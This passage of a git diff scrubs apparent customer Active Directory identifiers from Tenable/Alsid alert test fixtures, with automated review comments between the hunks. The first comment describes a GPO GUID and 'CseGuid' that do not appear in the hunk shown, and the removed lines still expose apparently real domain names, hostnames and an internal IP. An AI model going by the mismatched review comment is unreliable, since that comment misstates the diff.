b/Tenable/alsid/tests/alert_obsolete_system.json 
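Review bot: The replacement values in this hunk are derived from the originals rather than synthetic: the new GPO GUID in `ADobject` keeps the `3D4A6260` prefix and `DC6D419` stem of the removed one, and `ADdevianceID`/`eventID` keep the leading digits of the old numbers, so anyone holding the old fixture can still correlate them. If these were real customer identifiers, as the subject "Fix client data" suggests, the removed strings also remain in the repository history until it is rewritten, so this commit alone does not remove them from the published repo. Consider fully synthetic values for the GUID and numeric IDs (for example `{00000000-0000-0000-0000-000000000001}` and round numbers unrelated to the originals), applied identically to the `input` and `expected` messages so the fixture stays self-consistent. `CseGuid` is carried over unchanged; if it is a product- or vendor-defined extension identifier rather than tenant data that is fine, but it is worth confirming before leaving it in.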
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"" }, "expected": { - "message": "\"0\" \"1\" \"ad.domain\" \"urdom.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=urdom,DC=ad,DC=domain\" \"2007590\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964369\" \"ComputerCn\"=\"cnpsp16bd\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", + "message": "\"0\" \"1\" \"ad.domain\" \"test.ad.domain\" \"C-OBSOLETE-SYSTEMS\" \"high\" \n \"CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC \n ter,DC=testDC,DC=ad,DC=domain\" \"2007000\" \"2\" \"R-SLEEPING-OBSOLETE-SYSTEMS\" \n \"78964000\" \"ComputerCn\"=\"testComputerCN\" \"OperatingSystem\"=\"Windows Server 2012 R2 \n Standard\" \"OperatingSystemVersion\"=\"6.3 (9600)\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,16 +13,16 @@ "outcome": "success", "outcome_reason": "R-SLEEPING-OBSOLETE-SYSTEMS", "properties": { - "ADdevianceID": 2007590, - "ADdomainName": "urdom.ad.domain", + "ADdevianceID": 2007000, + "ADdomainName": "test.ad.domain", "ADforestName": "ad.domain", - "ADobject": "CN=cnpsp16bd,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=urdom,DC=ad,DC=domain", - "ComputerCn": "cnpsp16bd", + "ADobject": "CN=testCN,OU=Sharepoint,OU=Production,OU=DataCenter,OU=Serveurs,OU=DataC ter,DC=testDC,DC=ad,DC=domain", + "ComputerCn": "testComputerCN", "OperatingSystem": "Windows Server 2012 R2 Standard", "OperatingSystemVersion": "6.3 (9600)", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "78964369" + "eventID": "78964000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/alert_pattern2.json b/Tenable/alsid/tests/alert_pattern2.json index 2364c0604..c514b9478 100644 --- a/Tenable/alsid/tests/alert_pattern2.json +++ b/Tenable/alsid/tests/alert_pattern2.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"" }, "expected": { - "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-040\" \"10.17.92.40\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-040\" \"dc_ip\"=\"10.17.92.40\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", + "message": "\"2\" \"21\" \"foo.ad.com\" \"AD\" \"Suspicious DC Password Change\" \"critical\" \"Unknown\" \"Unknown\" \"HOSTNAME-000\" \"1.2.3.4\" \"user\"=\"ANONYMOUS LOGON\" \"source_hostname\"=\"Unknown\" \"source_ip\"=\"Unknown\" \"dc_name\"=\"HOSTNAME-000\" \"dc_ip\"=\"1.2.3.4\" \"targeted_dc_account\"=\"USERNAME-002$\" \"tool\"=\"foo-script\" \"password_renewal_duration\"=\"30:04:30:05\"", "event": { "kind": "alert" }, 
@@ -13,13 +13,13 @@ "ADforestName": "foo.ad.com", "ADobject": "Suspicious DC Password Change", "alertID": 21, - "dc_ip": "10.17.92.40", - "dc_name": "HOSTNAME-040", + "dc_ip": "1.2.3.4", + "dc_name": "HOSTNAME-000", "eventID": "critical", "eventType": "Unknown", "field1": "Unknown", - "field2": "HOSTNAME-040", - "field3": "10.17.92.40", + "field2": "HOSTNAME-000", + "field3": "1.2.3.4", "password_renewal_duration": "30:04:30:05", "source_hostname": "Unknown", "source_ip": "Unknown", diff --git a/Tenable/alsid/tests/event_1.json b/Tenable/alsid/tests/event_1.json index 1f9418431..e12e5d53e 100644 --- a/Tenable/alsid/tests/event_1.json +++ b/Tenable/alsid/tests/event_1.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958016\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271575\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON\" \"49271000\" \"UserCn\"=\"John DOE (Admin T0)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Adminintrator,CN=Users,DC=emae,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON", "properties": { - "ADdevianceID": 1958016, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", + "ADobject": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=emae,DC=corp", "PrivilegesPath": "CN=Adminintrator,CN=Users,DC=emae,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John DOE" } } diff --git a/Tenable/alsid/tests/event_2.json b/Tenable/alsid/tests/event_2.json index 9a09badeb..99cb8e395 100644 --- a/Tenable/alsid/tests/event_2.json +++ b/Tenable/alsid/tests/event_2.json 
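Review bot: The scrubbing of event_1.json is incomplete: the new input message still carries `DC=emae,DC=corp` inside both `PrivilegesPath` and `ParentContainer`, so the identifier the commit is trying to remove survives in the fixture, and the expected `ADobject` (`...DC=test,DC=corp`) and `ParentContainer` (`...DC=emae,DC=corp`) now disagree although in the original event they were the same DN. event_4.json in this same series rewrites all three DNs consistently; this file should do the same, i.e. `DC=emae,DC=corp` → `DC=test,DC=corp` in the input message, the expected message and the two expected properties. A sample whose object and its own parent container sit in different domains is also a less faithful fixture than the original, which presumably mirrored a real alert.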
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp\" \"1920595\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-UNCONST-DELEG\" \"critical\" \"CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp\" \"1920000\" \"2\" \"R-DELEG-PRIVUSERS-NOT-PROTECTED\" \"50666797\" \"Cn\"=\"Thrid Backup\" \"PrivilegesPath\"=\"CN=Backup,CN=Builtin,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" @@ -13,11 +13,11 @@ "outcome": "success", "outcome_reason": "R-DELEG-PRIVUSERS-NOT-PROTECTED", "properties": { - "ADdevianceID": 1920595, - "ADdomainName": "emea.corp", + "ADdevianceID": 1920000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=emea,DC=corp", - "PrivilegesPath": "CN=Backup,CN=Builtin,DC=emea,DC=corp", + "ADobject": "CN=Thrid Backup,OU=Technical,OU=Users,OU=Third,DC=test,DC=corp", + "PrivilegesPath": "CN=Backup,CN=Builtin,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", "eventID": "50666797" 
diff --git a/Tenable/alsid/tests/event_3.json b/Tenable/alsid/tests/event_3.json index 2611ce026..040246618 100644 --- a/Tenable/alsid/tests/event_3.json +++ b/Tenable/alsid/tests/event_3.json @@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"1959337\" \"2\" \"R-NOT-IN-WHITELIST\" \"51204253\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-NATIVE-ADM-GROUP-MEMBERS\" \"critical\" \"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"1959000\" \"2\" \"R-NOT-IN-WHITELIST\" \"51200000\" \"AccountCn\"=\"John Doe (Admin Root)\" \"GroupCn\"=\"Main Administrators\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,14 +13,14 @@ "outcome": "success", "outcome_reason": "R-NOT-IN-WHITELIST", "properties": { - "ADdevianceID": 1959337, - "ADdomainName": "emea.corp", + "ADdevianceID": 1959000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "CN=Main Administrators,CN=Users,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "critical", - "eventID": "51204253" + "eventID": "51200000" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/event_4.json b/Tenable/alsid/tests/event_4.json index 418ddd8b1..d3deeae5d 100644 --- a/Tenable/alsid/tests/event_4.json +++ b/Tenable/alsid/tests/event_4.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\" \"1958033\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271575\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"emea.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=emea,DC=corp\" \"ParentContainer\"=\"OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-ADMIN-RESTRICT-AUTH\" \"high\" \"OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp\" \"1958000\" \"2\" \"R-PRIVUSER-CAN-LOGON-ACROSS-TRUST\" \"49271000\" \"UserCn\"=\"John Doe (Admin Root)\" \"UserDomain\"=\"test.corp\" \"PrivilegesPath\"=\"CN=Main Administrators,CN=Users,DC=test,DC=corp\" \"ParentContainer\"=\"OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp\"", "event": { "kind": "alert", "outcome": "success" 
@@ -13,15 +13,15 @@ "outcome": "success", "outcome_reason": "R-PRIVUSER-CAN-LOGON-ACROSS-TRUST", "properties": { - "ADdevianceID": 1958033, - "ADdomainName": "emea.corp", + "ADdevianceID": 1958000, + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "ParentContainer": "OU=D528,OU=Desktops,OU=Computers,DC=emae,DC=corp", - "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=emea,DC=corp", + "ADobject": "OU=test_OU,OU=Desktops,OU=Computers,DC=test_DC,DC=corp", + "ParentContainer": "OU=D000,OU=Desktops,OU=Computers,DC=test,DC=corp", + "PrivilegesPath": "CN=Main Administrators,CN=Users,DC=test,DC=corp", "alertID": 1, "alertSeverityLevel": "high", - "eventID": "49271575" + "eventID": "49271000" }, "type": "alert" }, @@ -35,7 +35,7 @@ "type": "ldap" }, "user": { - "domain": "emea.corp", + "domain": "test.corp", "name": "John Doe" } } diff --git a/Tenable/alsid/tests/ioe_security_alert1.json b/Tenable/alsid/tests/ioe_security_alert1.json index b149081cb..dbe95b13a 100644 --- a/Tenable/alsid/tests/ioe_security_alert1.json +++ b/Tenable/alsid/tests/ioe_security_alert1.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\" \"TrusteeCn\"=\"GustavoFring\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\" \"TrusteeCn\"=\"JohnDoe\"", "event": { "kind": "alert", "outcome": "success" @@ -14,13 +14,13 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", - "TrusteeCn": "GustavoFring", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", + "TrusteeCn": "JohnDoe", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert3.json b/Tenable/alsid/tests/ioe_security_alert3.json index abfdf8cc5..dd4f9ac7f 100644 --- a/Tenable/alsid/tests/ioe_security_alert3.json +++ b/Tenable/alsid/tests/ioe_security_alert3.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2434\"", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-DONT-EXPIRE\" \"medium\" \"CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp\" \"28\" \"1\" \"R-DONT-EXPIRE-SET\" \"2400\"", "event": { "kind": "alert", "outcome": "success" @@ -14,12 +14,12 @@ "outcome_reason": "R-DONT-EXPIRE-SET", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=emea,DC=corp", + "ADobject": "CN=John Doe,OU=test_OU,OU=test_ou1,DC=test_DC,DC=corp", "alertID": 1, "alertSeverityLevel": "medium", - "eventID": "2434" + "eventID": "2400" }, "type": "alert" }, diff --git a/Tenable/alsid/tests/ioe_security_alert4.json b/Tenable/alsid/tests/ioe_security_alert4.json index 4b340737e..6c89b301f 100644 --- a/Tenable/alsid/tests/ioe_security_alert4.json +++ b/Tenable/alsid/tests/ioe_security_alert4.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n" }, "expected": { - "message": "\"0\" \"1\" \"Alsid Forest\" \"emea.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", + "message": "\"0\" \"1\" \"Alsid Forest\" \"test.corp\" \"C-PASSWORD-POLICY\" \"critical\" \"OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp\" \"28\" \"2\" \"R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED\" \"2434\" \"AttributeName\"=\"inf-system_access-lockoutbadcount\" \"OuCn\"=\"Packaging\"\n", "event": { "kind": "alert", "outcome": "success" @@ -14,9 +14,9 @@ "outcome_reason": "R-LOCAL-ACCOUNTS-PWD-INHERITANCE-BLOCKED", "properties": { "ADdevianceID": 28, - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=emea,DC=corp", + "ADobject": "OU=ORG,OU=Example,OU=Computers,OU=NDFRE,DC=test,DC=corp", "AttributeName": "inf-system_access-lockoutbadcount", "OuCn": "Packaging", "alertID": 1, diff --git a/Tenable/alsid/tests/trailflow_alert1.json b/Tenable/alsid/tests/trailflow_alert1.json index 2fa82823e..b41cd7fcc 100644 --- a/Tenable/alsid/tests/trailflow_alert1.json +++ b/Tenable/alsid/tests/trailflow_alert1.json 
@@ -1,9 +1,9 @@ { "input": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"" }, "expected": { - "message": "\"1\" \"1\" \"Alsid Forest\" \"emea.corp\" \"CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp\" \"2434\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", + "message": "\"1\" \"1\" \"Alsid Forest\" \"test.corp\" \"CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp\" \"2400\" \"UAC changed\" whenchanged=\"\"2020-01-09T09:24:41.0000000Z\"\"", "event": { "kind": "trailflow", "outcome": "success" @@ -12,13 +12,13 @@ "name": "UAC changed", "outcome": "success", "properties": { - "ADdomainName": "emea.corp", + "ADdomainName": "test.corp", "ADforestName": "Alsid Forest", - "ADobject": "CN=Gustavo Fring,OU=Los_Pollos_Hermanos,OU=Emea,DC=Emea,DC=corp", + "ADobject": "CN=John doe,OU=test_OU,OU=test_OU1,DC=test_DC,DC=corp", "alertID": 1, "alsidAttributeName": "whenchanged", "alsidAttributeValue": "\"2020-01-09T09:24:41.0000000Z\"", - "eventID": "2434", + "eventID": "2400", "eventType": "UAC changed" }, "type": "trailflow" diff --git a/Tenable/alsid/tests/trailflow_alert2.json b/Tenable/alsid/tests/trailflow_alert2.json index a26f52b7b..38f57b925 100644 --- a/Tenable/alsid/tests/trailflow_alert2.json +++ b/Tenable/alsid/tests/trailflow_alert2.json 
